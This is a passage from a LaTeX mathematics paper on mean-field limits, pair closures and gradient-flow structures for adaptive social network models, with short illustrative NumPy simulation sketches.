& \int_0^T \int \partial_t \varphi_k(z_k,t) \mu^{\infty:k}_t (dz_k) + \sum_{i \leq k}
\int_0^T \int \nabla_{s_i} \varphi_k(z_k,t)\cdot U(s_i,s_{k+1},w_{ik+1}) \mu_t^{\infty:k+1}(dz_{k+1} )
\nonumber \\ & \qquad \qquad + \sum_{i \leq k} \sum_{j \neq i, j \leq k} \int_0^T \int \nabla_{w_{ij}}
\varphi_k(z_k,t) \cdot V(s_i,s_j,w_{ij}) \mu_t^{\infty:k}(dz_k ) = 0 , \label{eq:hierarchyweak}
\end{align}
with continuously differentiable test functions $\varphi_k$ depending on $z_k$. We start with a case where some kind of propagation of chaos exists, namely if the weights are fully concentrated.
\subsection{Mean-Field Models for Weight Concentration}
As mentioned above there is no propagation of chaos, i.e. no simple mean-field solution of the infinite hierarchy in general, but we can find one if there is concentration of weights. The latter is not surprising, since once we have weight concentration, the resulting hierarchy can effectively be rewritten in terms of the states $s_i$ only. Such solutions can be found for the paradigmatic model only and are related to special solutions of the form
$w_{ij}(t)=W(s_i(t),s_j(t),t)$ of \eqref{eq:microscopic1}, \eqref{eq:microscopic2}. Essentially we look for solutions of
$$ \frac{d}{dt}W(s_i(t),s_j(t),t) = V(s_i(t),s_j(t),W(s_i(t),s_j(t),t)), $$
which by the chain rule is converted to a transport equation for $W$.
In order to construct weight concentrated mean-field solutions, we look for measures of the form
$$ \mu^{\infty:k}_t(dz_k) = \lambda^k_t(ds_1,\ldots,ds_k) \prod_{i\leq k}\prod_{j \neq i,j \leq k} \delta_{W(s_i,s_j,t)}(dw_{ij}), $$
with some function $W:{\cal S} \times {\cal S} \times (0,T) \rightarrow {\cal W}$ encoding the weights between states $s_i$ and $s_j$. We find
$$ \int_0^T \int \varphi_k(z_k,t) \mu^{\infty:k}_t(dz_k) = \int_0^T \int \psi_k(s_1,\ldots,s_k,t)\lambda^k_t(ds_1,\ldots,ds_k),$$
where we introduce the short-hand notation
$$ \psi_k(s_1,\ldots,s_k,t) = \varphi_k(s_1,\ldots,s_k,W(s_1,s_2,t),\ldots,W(s_{k-1},s_k,t),t). $$
We notice that
$$ \partial_t \psi_k = \partial_t \varphi_k + \sum_i \sum_{j \neq i} \partial_{w_{ij}} \varphi_k \cdot \partial_t W(s_i,s_j,t) $$
and
$$ \nabla_{s_i} \psi_k = \nabla_{s_i} \varphi_k + \sum_{j \neq i} \partial_{w_{ij}} \varphi_k \cdot \nabla_{s_1} W(s_i,s_j,t) + \sum_{j \neq i} \partial_{w_{ji}} \varphi_k \cdot \nabla_{s_2} W(s_j,s_i,t) . $$
Inserting these relations for $\partial_t \varphi_k$ and $\nabla_{s_i} \varphi_k$ into \eqref{eq:hierarchyweak} we obtain
\begin{align}
& \int_0^T \int \partial_t \psi_k(z_k,t) \, \lambda^{k}_t(ds_1,\ldots,ds_k) \, dt \nonumber\\ &\qquad + \sum_{i \leq k}
\int_0^T \int \nabla_{s_i} \psi_k(z_k,t)\cdot U(s_i,s_{k+1},W(s_i,s_{k+1},t)) \, \lambda_t^{k+1}(ds_1,\ldots,ds_{k+1} ) \, dt
= R_k ,
\end{align}
with the remainder term
\begin{align*}
R_k =& \sum_{i \leq k} \sum_{j \neq i} \int_0^T \int \partial_{w_{ij}} \varphi_k \cdot \partial_t W(s_i,s_j,t) \lambda^{k}_t(ds_1,\ldots,ds_k)
+ \\ &\sum_{i \leq k} \sum_{j \neq i} \int_0^T \int \partial_{w_{ij}} \varphi_k \cdot \nabla_{s_1} W(s_i,s_j,t) U(s_i,s_{k+1},W(s_i,s_{k+1},t)) \lambda_t^{k+1}(ds_1,\ldots,ds_{k+1}) + \\ &\sum_{i \leq k} \sum_{j \neq i} \int_0^T \int \partial_{w_{ij}} \varphi_k \cdot \nabla_{s_2} W(s_i,s_j,t) U(s_j,s_{k+1},W(s_j,s_{k+1},t)) \lambda_t^{k+1}(ds_1,\ldots,ds_{k+1} ) - \\&
\sum_{i \leq k} \sum_{j \neq i} \int_0^T \int \partial_{w_{ij}} \varphi_k \cdot V(s_i,s_j,W(s_i,s_j,t)) \lambda^{k}_t(ds_1,\ldots,ds_k) .
\end{align*}
Now we see that there is a special solution of the form
$$ \lambda^{k}_t(ds_1,\ldots,ds_k) = \prod_{i=1}^k \lambda_t^1(ds_i), $$
with $\lambda_t^1$ solving the mean-field equation
\begin{equation} \label{eq:charweightconcentration}
\partial_t \lambda_t^1 + \nabla_{s_1} \cdot \left[ \lambda_t^1 \int U(s_1,s_2,W(s_1,s_2,t)) \lambda_t^{1}(ds_2) \right] = 0,
\end{equation}
and $R_k$ vanishes if $W$ solves the transport equation
\begin{align*}
\partial_t W(s_1,s_2,t) + \int U(s_1,s_3,W(s_1,s_3,t)) \lambda_t^{1}(ds_3) \cdot \nabla_{s_1} W(s_1,s_2,t) &\\ +\int U(s_2,s_3,W(s_2,s_3,t)) \lambda_t^{1}(ds_3) \cdot \nabla_{s_2} W(s_1,s_2,t)
&= V(s_1,s_2,W(s_1,s_2,t)) .
\end{align*}
Let us mention that we can solve \eqref{eq:charweightconcentration} by the method of characteristics
\begin{align}
\partial_t S(t;s_1) &= \int U(S(t;s_1),S(t;s'),\hat W(t;s_1,s')) \lambda^1_0(ds') \label{eq:char1wc} \\
\partial_t \hat W(t;s_1,s_2) &= V(S(t;s_1),S (t;s_2),\hat W(t;s_1,s_2)) \label{eq:char2wc}
\end{align}
with $\hat W(t;s_1,s_2) := W(S(t;s_1),S(t;s_2),t)$.
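The characteristic system \eqref{eq:char1wc}, \eqref{eq:char2wc} is also a convenient starting point for numerical experiments. The following sketch replaces $\lambda_0^1$ by the empirical measure of $N$ sampled states and integrates the system with an explicit Euler scheme; the concrete choices of $U$, $V$ and all parameters are illustrative assumptions, not part of the model above.

```python
import numpy as np

# Illustrative choices (assumptions, not from the text): states in R^1,
#   U(s1, s2, w) = w * (s2 - s1)            (attraction scaled by the weight)
#   V(s1, s2, w) = -w + exp(-(s1 - s2)^2)   (weights relax to a similarity kernel)

def U(s1, s2, w):
    return w * (s2 - s1)

def V(s1, s2, w):
    return -w + np.exp(-(s1 - s2) ** 2)

def solve_characteristics(s0, w0, T=1.0, steps=200):
    """Explicit Euler for the characteristic system, with lambda_0^1
    replaced by the empirical measure of the N samples in s0."""
    S, W = s0.copy(), w0.copy()   # S(t; s_i) and W-hat(t; s_i, s_j)
    dt = T / steps
    for _ in range(steps):
        # mean-field velocity: (1/N) sum_j U(S_i, S_j, W_ij)
        vel = U(S[:, None], S[None, :], W).mean(axis=1)
        S, W = S + dt * vel, W + dt * V(S[:, None], S[None, :], W)
    return S, W

rng = np.random.default_rng(0)
N = 50
s0 = rng.normal(size=N)        # samples from lambda_0^1
w0 = np.zeros((N, N))          # initially unweighted network
S, W = solve_characteristics(s0, w0)
```

Since the weights stay nonnegative for these choices, the sampled states contract towards each other, i.e. the empirical spread of $S$ decreases in time.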
\begin{prop} \label{weightconcentrationproof}
Let $U$ and $V$ be Lipschitz continuous and let $\lambda^1_0 \in {\cal M}_+(\R^m)$.
Then there exists a unique solution
$$ S \in C^1(0,T;C(\R^m)), \qquad \hat W \in C^1(0,T;C(\R^{2m}))$$
of the characteristic system \eqref{eq:char1wc}, \eqref{eq:char2wc}. Moreover, $s \mapsto S(t;s)$ is a one-to-one map on $\R^{m}$ for each $t > 0$.
\end{prop}
\begin{proof}
Due to the Picard-Lindel\"of Theorem we conclude existence and uniqueness of solutions of \eqref{eq:char1wc}, \eqref{eq:char2wc}.
The fact that $s \mapsto S(t;s)$ is injective follows from the uniqueness of solutions of the ODE system, and its surjectivity from the analogous existence result applied to \eqref{eq:char1wc}, \eqref{eq:char2wc} with terminal conditions.
\end{proof}
As a consequence of the analysis of the characteristics we immediately obtain the existence and uniqueness of a solution of \eqref{eq:charweightconcentration} as the push-forward of $\lambda_0^1$ under $S$.
\begin{cor}
Let $U$ and $V$ be Lipschitz continuous and let $\lambda^1_0 \in {\cal M}_+(\R^m)$. Then there exists a unique solution $\lambda_t^1 \in C(0,T;{\cal M}_+(\R^m))$ of \eqref{eq:charweightconcentration}.
\end{cor}
\subsection{Closure based on the conditional distribution}
In the following we provide some further mathematical analysis for the more general case, with the closure based on the conditional distribution. Correspondingly, we consider the equivalent system for the single-particle distribution $\mu_t^{1}$ and the conditional distribution $\gamma_{t} = \frac{\mu_t^{2}}{\mu_t^{1}}$, which is given by
\begin{align}
\partial_t \mu^{ 1}_t +
\nabla_{s_1} \cdot \left(\int U(s_1,s',w') \gamma_t(s_1;ds',dw') \mu^1_t \right) &= 0 \label{eq:conddist1} \\
\partial_t \gamma_t + \int U(s_1,s',w') \gamma_t(s_1;ds',dw') \cdot \nabla_{s_1} \gamma_t & \nonumber \\
+ \nabla_{s_2} \cdot (\int U(s_2,s',w') \gamma_t(s_2;ds',dw') \gamma_t) +
\partial_w \cdot(V(s_1,s_2,w) \gamma_t)&= 0 \label{eq:conddist2}
\end{align}
Note that we consider $\gamma_t$ as a map from ${\cal S}$ to ${\cal M}_+({\cal S} \times {\cal W})$.
In this formulation it is straightforward to verify that the equations are consistent with \eqref{eq:charweightconcentration}, i.e., the
weight-concentration case still yields special solutions of \eqref{eq:conddist1}, \eqref{eq:conddist2}. This suggests investigating the latter with a similar system of characteristics, which we discuss in the following.
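To make the closure term appearing in \eqref{eq:conddist1} concrete, the following sketch estimates the drift $\int U(s_1,s',w')\,\gamma_t(s_1;ds',dw')$ from particle data $(s_i,w_{ij})$, using a Nadaraya--Watson-type kernel estimate of the conditional distribution $\gamma_t = \mu_t^2/\mu_t^1$. The interaction rule $U$, the Gaussian kernel and the bandwidth are illustrative assumptions, not taken from the text.

```python
import numpy as np

def U(s1, s2, w):
    return w * (s2 - s1)        # illustrative interaction rule (an assumption)

def closure_term(s_query, s, W, h=0.3):
    """Estimate int U(s_query, s', w') gamma_t(s_query; ds', dw') from
    particles s (shape (N,)) and weights W (shape (N, N))."""
    # kernel weights: how close particle i is to the query state s_query
    k = np.exp(-((s - s_query) ** 2) / (2 * h ** 2))
    k /= k.sum()
    # for each particle i, average U over its partners j with weights w_ij
    contrib = np.array([U(s_query, s, W[i]).mean() for i in range(len(s))])
    return float(k @ contrib)

rng = np.random.default_rng(3)
s = rng.normal(size=200)
W = rng.uniform(0.0, 1.0, size=(200, 200))
drift = closure_term(0.0, s, W)
```

In a particle scheme, such an estimate would replace the exact conditional expectation in the drift of \eqref{eq:conddist1}.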
\subsubsection{A method of characteristics}
In order to analyze the existence and uniqueness of solutions to \eqref{eq:conddist1}, \eqref{eq:conddist2}, we study
the characteristic system
\begin{align}
\partial_t S(t;s_1,w) &= \int U(S(t;s_1,w),S(t;s',w'),W(t;s_1,s',w')) \gamma_0(s_1;ds',dw') \label{eq:char1} \\
\partial_t W(t;s_1,s_2,w) &= V(S(t;s_1,w),S(t;s_2,w),W(t;s_1,s_2,w)), \label{eq:char2}
\end{align}
which generalizes the one in the case of weight concentration. With a proof analogous to that of Proposition \ref{weightconcentrationproof} we obtain the following result.
\begin{prop}
Let $U$ and $V$ be Lipschitz continuous and let $\mu^1_0 \in {\cal M}_+(\R^m)$, $\gamma_0 \in C(\R^m;{\cal M}_+(\R^m \times \R))$.
Then there exists a unique solution
$$ S \in C^1(0,T;C(\R^{m+1})), \qquad W \in C^1(0,T;C(\R^{2m+1}))$$
of the characteristic system \eqref{eq:char1}, \eqref{eq:char2}. Moreover, $(s_1,s_2,w) \mapsto (S(t;s_1,w),S(t;s_2,w),W(t;s_1,s_2,w))$ is a one-to-one map on $\R^{2m+1}$.
\end{prop}
Based on the solutions of the characteristic system we can construct a solution of \eqref{eq:conddist1}, \eqref{eq:conddist2}: we define $\mu^1_t$ as the push-forward of $\mu^1_0$ under $S$ and $\gamma_t$ via
$$ \int \int \varphi(S(t;s_2,w),W(t;s_1,s_2,w)) \gamma_t(S(t;s_1,w);ds_2,dw) = \int \int \varphi(s_2,w) \gamma_0(s_1;ds_2,dw) $$
for all $t \in [0,T]$, $s_1 \in \R^m$ and $\varphi \in C_b(\R^{m+1})$.
\begin{cor}
Let $U$ and $V$ be Lipschitz continuous and let $\mu^1_0 \in {\cal M}_+(\R^m), \gamma_0 \in C(\R^m;{\cal M}_+(\R^m \times \R))$. Then there exists a unique solution $\mu_t^1 \in C(0,T;{\cal M}_+(\R^m))$, $\gamma_t \in C(0,T;C(\R^m;{\cal M}_+(\R^m \times \R)))$ of \eqref{eq:conddist1}, \eqref{eq:conddist2}.
\end{cor}
\subsubsection{Propagation of gradient flow structures}
In a gradient flow setting ($U = - \nabla_s F, V= - c \partial_w F$), we can rewrite the energy as
$$ \hat E(\mu^2) = \int \int \int F(s_1,s_2,w) \mu^2(ds_1,ds_2,dw) . $$
It is thus more convenient to use the formulation in terms of the pair distribution $\mu^2$ instead of \eqref{eq:conddist1}, \eqref{eq:conddist2}. We have
\begin{align*}
\partial_t \mu^{ 2}_t =& \nabla_{s_1} \cdot (\int \nabla_{s_1} F(s_1,s',w') \gamma_t(s_1;ds',dw') \mu^2_t)
+ \nonumber \\
& \nabla_{s_2} \cdot (\int \nabla_{s_2} F(s',s_2,w') \gamma_t(s_2;ds',dw') \mu^2_t) + c \partial_w \cdot( \partial_w F(s_1,s_2,w) \mu^2_t),
\end{align*}
which is indeed an abstract gradient flow formulation, since it applies a negative semidefinite operator to the energy variation. The energy dissipation is given by
\begin{align*}
\frac{d}{dt} \hat E(\mu_t^2) =& - \int \left\vert \int \int \nabla_{s_1} F(s_1,s',w') \gamma_t(s_1;ds',dw') \right\vert^2 \mu_t^1(ds_1) \\& - \int \left\vert \int \int \nabla_{s_2} F(s',s_2,w') \gamma_t(s_2;ds',dw') \right\vert^2 \mu_t^1(ds_2) \\& - c \int \int \int |\partial_w F(s_1,s_2,w)|^2 \mu_t^2(ds_1,ds_2,dw).
\end{align*}
Thus, the gradient flow structure and the energy dissipation are propagated through the closure based on the conditional distribution, which appears to be a distinctive property of this closure. In the general case the first two dissipation terms on the right-hand side would change, e.g. the first one to
$$
- \int \int \int \int \int \int \nabla_{s_1} F(s_1,s_3,w_{13}) \cdot \nabla_{s_1} F(s_1,s_2,w_{12}) \, \mu_t^3(ds_1,ds_2,ds_3,dw_{12},dw_{13},dw_{23})
$$
and with other closures such as the Kirkwood closure there is no particular reason for this term to be negative; in other words, the associated bilinear form of $F$ is not definite.
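The dissipation property can also be checked at the particle level. The sketch below runs explicit-Euler gradient descent on the empirical energy $E_N = \frac{1}{N^2}\sum_{i,j} F(s_i,s_j,w_{ij})$ for a hypothetical convex pair energy (an assumption chosen purely for illustration, in the spirit of $U=-\nabla_s F$, $V=-c\,\partial_w F$) and verifies that the energy decreases monotonically.

```python
import numpy as np

# Hypothetical pair energy (assumption, not from the text):
#   F(s1, s2, w) = (s1 - s2)^2 / 2 + (w - (s1 - s2))^2 / 2

def energy(s, W):
    D = s[:, None] - s[None, :]              # D[i, j] = s_i - s_j
    return float(np.sum(D ** 2 / 2 + (W - D) ** 2 / 2)) / len(s) ** 2

def gradients(s, W):
    D = s[:, None] - s[None, :]
    # exact gradients of the empirical energy E_N with respect to s and W
    grad_s = (4 * D - W + W.T).sum(axis=1) / len(s) ** 2
    grad_W = (W - D) / len(s) ** 2
    return grad_s, grad_W

rng = np.random.default_rng(1)
N, c, dt = 30, 1.0, 0.1
s = rng.normal(size=N)
W = rng.normal(size=(N, N))
energies = [energy(s, W)]
for _ in range(200):
    gs, gW = gradients(s, W)
    s, W = s - dt * gs, W - dt * c * gW
    energies.append(energy(s, W))
```

For a sufficiently small step size the discrete energy is nonincreasing, mirroring the dissipation identity above; with a closure that destroys the sign structure, no such guarantee would remain.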
\section{Variants and Open Problems}
\subsection{Weight Interactions and Balance Theory}
In our previous treatment we assumed that there is no interaction between weights, but this was mainly a simplification to present the basic approach. Many recent treatments of social network formation rely on social balance theory, which effectively implies that the change of a network link (weight) depends on the weights in a triangle with a third agent (cf. \cite{belaza,pham,pham2,ravazzi}). In our modelling approach this is a minor modification at the microscopic level, leading to
\begin{align}
\partial_t \mu_t^N =& \frac{1}N \sum_{i=1}^N \sum_{j\neq i} D_{s_i}^* (U(s_i,s_j,w_{ij}) \mu_t^N) + \frac{1}N\sum_{i=1}^N \sum_{j\neq i}
\sum_{k\neq i,j} D_{w_{ij}}^* (V(s_i,s_j,w_{ij},w_{ik},w_{jk}) \mu_t^N) \nonumber \\
& + \sum_{i=1}^N D_{s_i}^* (U_0(s_i) \mu_t^N) - \sum_{i=1}^N D_{s_i}^* D_{s_i} (Q(s_i) \mu_t^N) - \sum_{i=1}^N \sum_{j\neq i} D_{w_{ij}}^*D_{w_{ij}}(R(s_i,s_j,w_{ij}) \mu_t^N). \label{eq:weightinteraction}
\end{align}
There is, however, an interesting consequence for the macroscopic description, since we also obtain an integral involving a higher-order moment in the term with $V$. A simple closure based on the conditional distribution will definitely not suffice if $V$ depends on a triangle of weights; hence the Kirkwood closure seems to be the natural option.
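A minimal microscopic sketch of such a triangle-dependent weight dynamics (ignoring the state dynamics and the noise terms, and with an illustrative balance-type rule realizing $V(s_i,s_j,w_{ij},w_{ik},w_{jk})$ as $\dot w_{ij} = \alpha\,\frac{1}{N}\sum_k w_{ik}w_{kj} - w_{ij}$ --- an assumption for illustration, not taken from the cited models):

```python
import numpy as np

def step(W, alpha=1.0, dt=0.05):
    """One Euler step of dw_ij/dt = alpha * (1/N) sum_k w_ik w_kj - w_ij:
    a link is reinforced when the triangles through it are balanced."""
    triad = W @ W / W.shape[0]               # (1/N) sum_k w_ik w_kj
    W = W + dt * (alpha * triad - W)
    np.fill_diagonal(W, 0.0)                 # no self-loops
    return np.clip(W, -1.0, 1.0)             # keep weights bounded

rng = np.random.default_rng(2)
N = 40
W = rng.uniform(-0.5, 0.5, size=(N, N))
W = (W + W.T) / 2                            # symmetric initial weights
np.fill_diagonal(W, 0.0)
for _ in range(400):
    W = step(W)
```

For the parameters chosen here the decay dominates and the weights relax towards zero; with stronger triadic reinforcement such dynamics are known to saturate in balanced ("factional") weight patterns, which is exactly the regime where a closure beyond the conditional distribution becomes necessary.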
\subsection{Beyond Pair Interaction}
As we have already seen in the example of the voter model from \cite{thurner} above, several models go beyond a simple pair interaction, e.g. with triplets (cf. \cite{lambiotte,zanette,neuhaeuser}) or with interactions via the degree (cf. \cite{kohne,raducha,tur}), which effectively averages over weights. Another effect found in some models is an averaging of states over the network or over adjacent nodes (cf. e.g. \cite{baumann}). Since many social processes may indeed arise from interactions of more than two agents, it will be an interesting direction to extend the approach to such cases and to study their effects on pattern formation. In particular it will be relevant to study whether the pair distribution still suffices to provide a suitable approximation.
\subsection{Analysis of Pair Closures}
From a mathematical point of view, an important open challenge is the analysis of pair closures, which seem inevitable in the case of network problems. Already the analysis of the arising equations for the pair distribution is not fully covered by existing PDE theory; it is also open whether it is more suitable to study the formulation in terms of the pair distribution or rather the one in terms of the conditional distribution.
Also the analysis of gradient structures or generalizations at the level of the pair distribution is an interesting topic for further investigations, related to the evolution of gradient structures like in \cite{burger} and possibly with other structures as in \cite{maas} for discrete models.
An even more challenging question is the analysis of pair closure relations for the BBGKY-type hierarchy, for which one would possibly need similar quantitative estimates as for the mean-field limit in \cite{mischler,paul}, which currently seem out of reach. Another level of complication would be to go beyond the mean-field scaling we have confined our presentation to.
From a more practical point of view it needs to be investigated which macroscopic models are efficient for simulations and in particular which can be effectively calibrated from data in order to make more than rough qualitative predictions.
\section*{Acknowledgements}
The author acknowledges partial financial support by European Union’s Horizon 2020 research and
innovation programme under the Marie Sklodowska-Curie grant agreement No. 777826
(NoMADS) and the German Science Foundation (DFG) through CRC TR 154 ``Mathematical Modelling, Simulation and Optimization Using the Example of Gas Networks'', Subproject C06.
| 2024-02-18T23:40:20.281Z | 2021-04-29T02:20:03.000Z | algebraic_stack_train_0000 | 2,101 | 11,229 |